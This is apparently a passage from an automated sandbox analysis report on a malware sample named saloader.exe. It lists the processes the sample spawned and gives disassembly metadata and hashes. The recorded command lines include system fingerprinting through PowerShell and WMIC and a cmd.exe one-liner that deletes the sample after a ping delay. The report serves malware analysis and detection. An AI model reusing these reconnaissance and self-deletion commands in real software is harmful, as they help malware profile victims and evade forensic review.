                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                        Imagebase:0x7ff741d30000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:28
                                                                                        Start time:21:46:20
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:29
                                                                                        Start time:21:46:38
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"wmic" path win32_VideoController get name
                                                                                        Imagebase:0x7ff65e6e0000
                                                                                        File size:576'000 bytes
                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:30
                                                                                        Start time:21:46:38
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:33
                                                                                        Start time:21:46:43
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\saloader.exe" && pause
                                                                                        Imagebase:0x7ff616770000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:34
                                                                                        Start time:21:46:43
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:35
                                                                                        Start time:21:46:43
                                                                                        Start date:29/11/2024
                                                                                        Path:C:\Windows\System32\PING.EXE
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:ping localhost
                                                                                        Imagebase:0x7ff764aa0000
                                                                                        File size:22'528 bytes
                                                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Executed Functions

                                                                                          Function 00007FFAAC7E4C62 Relevance: 39.2, Strings: 30, Instructions: 1718COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @\9O$@\9O$@\9O$H\9O$H\9O$H\9O$P\9O$P\9O$P\9O$P\9O$X\9O$X\9O$X\9O$X\9O$`\9O$`\9O$`\9O$`\9O$h\9O$h\9O$h\9O$h\9O$p\9O$p\9O$p\9O$p\9O$x\9O$x\9O$x\9O$x\9O
                                                                                          • API String ID: 0-959586471
                                                                                          • Opcode ID: 371311b68e5337a1cf5dcc06507dbe42924f1490cb2b03cce5b6ef315626e9db
                                                                                          • Instruction ID: f148c36153ba290331ac4293f74405b603040837813781f31eb7a2d78780c437
                                                                                          • Opcode Fuzzy Hash: 371311b68e5337a1cf5dcc06507dbe42924f1490cb2b03cce5b6ef315626e9db
                                                                                          • Instruction Fuzzy Hash: 16B2EB72A19A4A8FEB89DF688455A7077F1FF5A350B1440BED40EC72D3DE28DC468B81
                                                                                          Function 00007FFAAC7E4FF9 Relevance: 38.5, Strings: 30, Instructions: 1018COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @\9O$@\9O$@\9O$H\9O$H\9O$H\9O$P\9O$P\9O$P\9O$P\9O$X\9O$X\9O$X\9O$X\9O$`\9O$`\9O$`\9O$`\9O$h\9O$h\9O$h\9O$h\9O$p\9O$p\9O$p\9O$p\9O$x\9O$x\9O$x\9O$x\9O
                                                                                          • API String ID: 0-959586471
                                                                                          • Opcode ID: 4d3e5a64be4cc1b310dd99e5ebbce6366259dd293ef939238cf3e72d680fd702
                                                                                          • Instruction ID: 025a977223f91442f85c14250043d188dd81896948d37086eb815b141cd07975
                                                                                          • Opcode Fuzzy Hash: 4d3e5a64be4cc1b310dd99e5ebbce6366259dd293ef939238cf3e72d680fd702
                                                                                          • Instruction Fuzzy Hash: A262AD72A19B4A8FEBCD9B6C845567077E2FF5A340B5440BAD40EC72D3DE28DC868781
                                                                                          Function 00007FFAAC62C5C8 Relevance: 9.8, Strings: 7, Instructions: 1066COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: b9O$(b9O$Pb9O$Xb9O$ZM_H$`b9O$p:9O
                                                                                          • API String ID: 0-2694814116
                                                                                          • Opcode ID: fbe18bc76b48dadfac044fca02a29db96d692a3d425c2706f4aa6040ebfc74ca
                                                                                          • Instruction ID: 242bfe491608f08e2c130c05df49d855677a5667fd736433068c254da741f8e3
                                                                                          • Opcode Fuzzy Hash: fbe18bc76b48dadfac044fca02a29db96d692a3d425c2706f4aa6040ebfc74ca
                                                                                          • Instruction Fuzzy Hash: 8972F575E09A4A8FFB85DF28C454AA9B7E1FF59300F1495B9D40DCB292DE34E846CB80
                                                                                          Function 00007FFAAC621D18 Relevance: 9.4, Strings: 7, Instructions: 627COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8`9O$8`9O$8`9O$@`9O$@`9O$H`9O$H`9O
                                                                                          • API String ID: 0-3952194114
                                                                                          • Opcode ID: bf6c44fa7ef3f101b2d8ab1049463fc16b414c19c3f82d1117bf20e1eb6eaffa
                                                                                          • Instruction ID: fbe75bd15746be1612052feffc8b91c0f0184da6978cacd50d740c5e74ff59ed
                                                                                          • Opcode Fuzzy Hash: bf6c44fa7ef3f101b2d8ab1049463fc16b414c19c3f82d1117bf20e1eb6eaffa
                                                                                          • Instruction Fuzzy Hash: E212E671A08A4A8FEB89DF2CC455AB577E1FF99310F1451BAD40EC7292EE34DC468780
                                                                                          Function 00007FFAAC7E70F2 Relevance: 8.8, Strings: 6, Instructions: 1269COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (79O$/$/$/$/$/
                                                                                          • API String ID: 0-3247863568
                                                                                          • Opcode ID: c0c407c94ee38ae83058fb58383fc91d69089450f49fc8dc03a49a4675f9557e
                                                                                          • Instruction ID: eb26cf722b8fe338cc339e4532ab4eee9b9203e9905e1e45cd9c747abcef7c7b
                                                                                          • Opcode Fuzzy Hash: c0c407c94ee38ae83058fb58383fc91d69089450f49fc8dc03a49a4675f9557e
                                                                                          • Instruction Fuzzy Hash: 50A24E71618A4ACFEB89EF28C455AA973F1FF59300F5045A9D41ECB296CF35E846CB80
                                                                                          Function 00007FFAAC7E4191 Relevance: 8.7, Strings: 6, Instructions: 1155COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0\9O$8h$8h$x69O$x69O$x69O
                                                                                          • API String ID: 0-852040939
                                                                                          • Opcode ID: d5ade7a7adfc4cc538752c98267066e23b5ca0161ea9d434d6f18612353b5851
                                                                                          • Instruction ID: 114ac6d9e00d6be993284a52f048215d1ee3f523de0b3ddfa3777294299b89c5
                                                                                          • Opcode Fuzzy Hash: d5ade7a7adfc4cc538752c98267066e23b5ca0161ea9d434d6f18612353b5851
                                                                                          • Instruction Fuzzy Hash: BA82E53690D65A8FEB55DB78D8516E97BF0FF46310F1481BAD04DCB293CE28E8468781
                                                                                          Function 00007FFAAC62BF9D Relevance: 5.6, Strings: 2, Instructions: 3054COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: kJ_L$KL
                                                                                          • API String ID: 0-1549098971
                                                                                          • Opcode ID: 148403305a14f531d4c3ee815831c330f2891470a0aef0eb70dd0aa40871c42a
                                                                                          • Instruction ID: 8474f71cb9f37082b1ee0a5baa11b688a372240b8ba8b1fb6e3ac26e94cf472b
                                                                                          • Opcode Fuzzy Hash: 148403305a14f531d4c3ee815831c330f2891470a0aef0eb70dd0aa40871c42a
                                                                                          • Instruction Fuzzy Hash: CE335F7061DB498FE7A5DB18C495ABA77E1FF99300F20957DD08EC3292DE34E8468782
                                                                                          Function 00007FFAAC7DE830 Relevance: 3.1, Strings: 2, Instructions: 587COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: [2_^$/
                                                                                          • API String ID: 0-2332170901
                                                                                          • Opcode ID: ddba48c3d04f6cc7ca7c6eff00c03356346b871571ef3b96d4cbcc9e030444fd
                                                                                          • Instruction ID: ded54f34715e9ab0811d9267b0b521eef4778ce25149096ff0c92bba0cb0987f
                                                                                          • Opcode Fuzzy Hash: ddba48c3d04f6cc7ca7c6eff00c03356346b871571ef3b96d4cbcc9e030444fd
                                                                                          • Instruction Fuzzy Hash: 5B025822A1DA468FE796E73CD8956F97BE1FF46310B1841BAD04DC7293DE18E84987C0
                                                                                          Function 00007FFAAC7D4198 Relevance: 2.6, Instructions: 2559COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e9f99349938a7acb65453ec6ddbe78aa5d9ba268c87eba7e2df4a392dfb1c2fb
                                                                                          • Instruction ID: 0a9bf5319afb3eab4c49c83bbc46ed14e593829ffc1bf8f918c6ad2a299e6a86
                                                                                          • Opcode Fuzzy Hash: e9f99349938a7acb65453ec6ddbe78aa5d9ba268c87eba7e2df4a392dfb1c2fb
                                                                                          • Instruction Fuzzy Hash: F313B6B191D3858FE7669F24C4426A57BF0EF57304F1485BEC48E8B193DE38A44ACB92
                                                                                          Function 00007FFAAC7DAA95 Relevance: 1.8, Strings: 1, Instructions: 535COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (%
                                                                                          • API String ID: 0-1001719454
                                                                                          • Opcode ID: 720d6b0abbf93b77b28833a74caa8d970c39eb2fb808b1ba7b16dc8af5e8a025
                                                                                          • Instruction ID: facbcdf28934c3d7cafd23564ed184604a480641cbe02fad4cc7adf899ef0e43
                                                                                          • Opcode Fuzzy Hash: 720d6b0abbf93b77b28833a74caa8d970c39eb2fb808b1ba7b16dc8af5e8a025
                                                                                          • Instruction Fuzzy Hash: 4BF1287190D68A8FEB56DF28C8516B67BF1FF56320F0445BAD05DD71C2DA28E80ACB81
                                                                                          Function 00007FFAAC7DEA10 Relevance: 1.7, Strings: 1, Instructions: 409COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /
                                                                                          • API String ID: 0-1686368129
                                                                                          • Opcode ID: b6564c9bd14ac40a22a5f44ed8c0a7931d02790e16a24f11a23323b7745cb844
                                                                                          • Instruction ID: 381b24d7df0cbbb03856d25bde305ce0fdd86b0e987daad33657a76ae79acd05
                                                                                          • Opcode Fuzzy Hash: b6564c9bd14ac40a22a5f44ed8c0a7931d02790e16a24f11a23323b7745cb844
                                                                                          • Instruction Fuzzy Hash: 1DC1C731A19A0A8FF79ADB2888557B977E1FF5A310F4441BAD41EC32D2DD28EC4587C1
                                                                                          Function 00007FFAAC7DE940 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /
                                                                                          • API String ID: 0-1686368129
                                                                                          • Opcode ID: 863ad5fc3250fa9c2dc4b15c9d94cd8270c355264f50ec0e271b997854d10a6a
                                                                                          • Instruction ID: ba9797d75cb4ef1c0d2dcaff8a4ea02023781a623466e1bd7529998bf81bca75
                                                                                          • Opcode Fuzzy Hash: 863ad5fc3250fa9c2dc4b15c9d94cd8270c355264f50ec0e271b997854d10a6a
                                                                                          • Instruction Fuzzy Hash: 56910531A196068FE796EB78D8956F97BE1FF89310F1841BAD04DC7293DE24A8458BC0
                                                                                          Function 00007FFAAC7DE950 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /
                                                                                          • API String ID: 0-1686368129
                                                                                          • Opcode ID: 3f07d471b565b200c1414e585642678c41440ee83669eb78fe96df6da000e375
                                                                                          • Instruction ID: 940f9493f0cf2560f9ed788342af49a5209da0395e741c13c894090f3e73d55f
                                                                                          • Opcode Fuzzy Hash: 3f07d471b565b200c1414e585642678c41440ee83669eb78fe96df6da000e375
                                                                                          • Instruction Fuzzy Hash: 5A910531E196068FE796EB38D8556F97BE1FF89310F1841BAD04DC7293DE24A8458780
                                                                                          Function 00007FFAAC7DE978 Relevance: 1.5, Strings: 1, Instructions: 291COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /
                                                                                          • API String ID: 0-1686368129
                                                                                          • Opcode ID: 2b5440dc5d675ccae5e2f61581ed99766c5521e1861ef4bce319da03846141cc
                                                                                          • Instruction ID: 95fc88acb97cae19fd423bea158d99f0ad7505dc59d37e4e7d7630d8584561dd
                                                                                          • Opcode Fuzzy Hash: 2b5440dc5d675ccae5e2f61581ed99766c5521e1861ef4bce319da03846141cc
                                                                                          • Instruction Fuzzy Hash: 2F81F531E19A0A8FE796EB38D8556F97BE1FF89310F5841BAD04DC7293DE24E8458780
                                                                                          Function 00007FFAAC7DE980 Relevance: 1.5, Strings: 1, Instructions: 287COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /
                                                                                          • API String ID: 0-1686368129
                                                                                          • Opcode ID: 89ca464fed329dc60a888a39a9bf8b7df3c8c6c1518fc2707b8b4b3302fffc92
                                                                                          • Instruction ID: 6e6d1f41f6bd3a75ff893a17e2d6eeaf966fccfd7b32147a87669bc8ff9e332d
                                                                                          • Opcode Fuzzy Hash: 89ca464fed329dc60a888a39a9bf8b7df3c8c6c1518fc2707b8b4b3302fffc92
                                                                                          • Instruction Fuzzy Hash: C781F631A1DA0A8FE796EB78C8556F97BE1FF89310F5841BAD04DC7293DE24E8458780
                                                                                          Function 00007FFAAC7DECBA Relevance: 1.5, Strings: 1, Instructions: 253COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /
                                                                                          • API String ID: 0-1686368129
                                                                                          • Opcode ID: 237cc556b8e43bd49a0048bd24478c6a67d6631e25b3c638816e4b7a34390e37
                                                                                          • Instruction ID: c61dc0ede68d406713b49ffea4f68a5fb619b98d6cfaddb056a621fec7c273db
                                                                                          • Opcode Fuzzy Hash: 237cc556b8e43bd49a0048bd24478c6a67d6631e25b3c638816e4b7a34390e37
                                                                                          • Instruction Fuzzy Hash: 29818231A1DA0A8FFB5ADB289456BB877E1FF59310F44817AE41EC32D2DD24EC458B81
                                                                                          Function 00007FFAAC660DC0 Relevance: .8, Instructions: 844COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a0b4b6281d72266a74da941cbf97ac991ed60e867a9d1f67870ecb1e49799409
                                                                                          • Instruction ID: e3e6abbc0d679e53e4cc164903674aef5d0097451d5be2a1f6d42ac49a079fcc
                                                                                          • Opcode Fuzzy Hash: a0b4b6281d72266a74da941cbf97ac991ed60e867a9d1f67870ecb1e49799409
                                                                                          • Instruction Fuzzy Hash: 6142A27061CA4A8FEB9DEB18C091AB5B3E1FFA9304B24957DD04EC3586DE35F8468780
                                                                                          Function 00007FFAAC660D48 Relevance: .8, Instructions: 751COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5b5fa08cd36fe07d833f478fc7db25a6bab9ba2da8d773395412b108432f363f
                                                                                          • Instruction ID: 24cb27c3860b3d3cfd8e7bc46350da2939f4d7d196599eff0654891d0e69a56c
                                                                                          • Opcode Fuzzy Hash: 5b5fa08cd36fe07d833f478fc7db25a6bab9ba2da8d773395412b108432f363f
                                                                                          • Instruction Fuzzy Hash: 30425D70A19A098FEB99DB28C495BB5B3E1FF59300F1091B9D44EC7291DE35F885CB81
                                                                                          Function 00007FFAAC668E08 Relevance: .7, Instructions: 706COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 72bd1737d50f682fb52cba2841261abf4507fe5755d19701d01e5bc3ec921302
                                                                                          • Instruction ID: 8be933a5d7aeb96ebb306d1300909a6e9df70399d57a8ac1824343440ab923a4
                                                                                          • Opcode Fuzzy Hash: 72bd1737d50f682fb52cba2841261abf4507fe5755d19701d01e5bc3ec921302
                                                                                          • Instruction Fuzzy Hash: E922297090DB858FE75BDB288861565BBE1EF97300B1991FAD04DC71A3DD28EC4AC782
                                                                                          Function 00007FFAAC7D338E Relevance: .7, Instructions: 672COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b22fd09a70b98a8eda54ed198552d2e64efcae1269f700d0761792249e7ea85b
                                                                                          • Instruction ID: dcec6e0cb28078e7fa4c7b8a4dbf5223457d63edd5b2c545908c22afce2cde07
                                                                                          • Opcode Fuzzy Hash: b22fd09a70b98a8eda54ed198552d2e64efcae1269f700d0761792249e7ea85b
                                                                                          • Instruction Fuzzy Hash: CF32B5A2C1E2C68FE3674B2845552B43FF0DF57220F0985FEC48D8B5A3ED18A51B8B81
                                                                                          Function 00007FFAAC625560 Relevance: .6, Instructions: 617COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7d4230496689155b1b8b4a6464e16361b2e92532ce835e1dc40b4af463b56d80
                                                                                          • Instruction ID: 8c44268512bb906b242f94a0436b095a8e770c931eabd50893009498be5ee159
                                                                                          • Opcode Fuzzy Hash: 7d4230496689155b1b8b4a6464e16361b2e92532ce835e1dc40b4af463b56d80
                                                                                          • Instruction Fuzzy Hash: B512B270A09A4ACFEB89DF28C455AB5B7E1FF5A310B1491B9D40EC72D2DE24EC46C781
                                                                                          Function 00007FFAAC7D481D Relevance: .6, Instructions: 610COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e47ff53a8bf88ef157ea4be8ac786d913e07bac261028179b88da8d2d7c871da
                                                                                          • Instruction ID: 34ecdff6c66dca5a6acd75474c455649b4563ec147aefa585a209f8557698776
                                                                                          • Opcode Fuzzy Hash: e47ff53a8bf88ef157ea4be8ac786d913e07bac261028179b88da8d2d7c871da
                                                                                          • Instruction Fuzzy Hash: 0622A570A1D7858FE36ADF14C4867A677E1FF96304F14857EC48EC7292DE38A4468B82
                                                                                          Function 00007FFAAC7E1D80 Relevance: .3, Instructions: 306COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 51fdeb889745c2e4fdc1c6f5d3cd8c6154a23f4e449bd33fe1c638d47ad4ea10
                                                                                          • Instruction ID: c52e83a24bd0ca6f0ec42a2f06c4eb8e492ba146fb240509a089a9aa9ebb6039
                                                                                          • Opcode Fuzzy Hash: 51fdeb889745c2e4fdc1c6f5d3cd8c6154a23f4e449bd33fe1c638d47ad4ea10
                                                                                          • Instruction Fuzzy Hash: D6A1B172A0DA458FF764DB28C05267AB7E1EF5A315F00857DE48EC76D3DE68E8498380
                                                                                          Function 00007FFAAC61E628 Relevance: 37.2, Strings: 29, Instructions: 983COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
